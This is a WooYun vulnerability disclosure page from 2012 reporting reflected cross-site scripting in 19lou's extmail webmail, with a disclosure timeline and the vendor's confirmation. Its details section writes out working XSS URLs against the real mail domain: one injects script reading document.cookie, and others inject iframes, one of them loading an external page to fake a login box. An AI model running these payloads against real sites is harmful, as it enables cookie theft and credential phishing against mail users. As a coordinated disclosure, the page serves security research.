当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-015005

漏洞标题:十九楼某关键内部系统跨站伪造登陆框

相关厂商:十九楼

漏洞作者: upload

提交时间:2012-11-20 15:51

修复时间:2013-01-04 15:52

公开时间:2013-01-04 15:52

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:6

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-11-20: 细节已通知厂商并且等待厂商处理中
2012-11-20: 厂商已经确认,细节仅向厂商公开
2012-11-30: 细节向核心白帽子及相关领域专家公开
2012-12-10: 细节向普通白帽子公开
2012-12-20: 细节向实习白帽子公开
2013-01-04: 细节向公众公开

简要描述:

1.跨站
2.伪造登陆框

详细说明:

邮箱系统:

https://mail.19lou.com/extmail/cgi/index.cgi


extmail几处反射性跨站,

https://mail.19lou.com/extmail/cgi/index.cgi?__mode=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&error=badlogi


https://mail.19lou.com//extman/cgi/signup.cgi?domain=%3Cscript%3Ealert%28document.cookie%29%3C/script%3


....
加载ifream

https://mail.19lou.com//extman/cgi/signup.cgi?domain=%3Ciframe%20src=%22http://wooyun.org%22%20width=%22500%22%20height=%22180%22%3E&error=badlogi


(图略)

漏洞证明:

伪造登陆框

https://mail.19lou.com/extmail/cgi/index.cgi?__mode=%22%3E%3Ciframe%20src=%22http://127.0.0.1/false.htm%22%20width=%22800%22%20height=%22980%22%20frameborder=0%20%3E%20&error=badlogi


伪造效果还行:

4.jpg


加载的外部false.htm

1.jpg


false.htm内容

2.jpg

修复方案:

貌似版本有点旧了

版权声明:转载请注明来源 upload@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2012-11-20 17:03

厂商回复:

收到。

最新状态:

暂无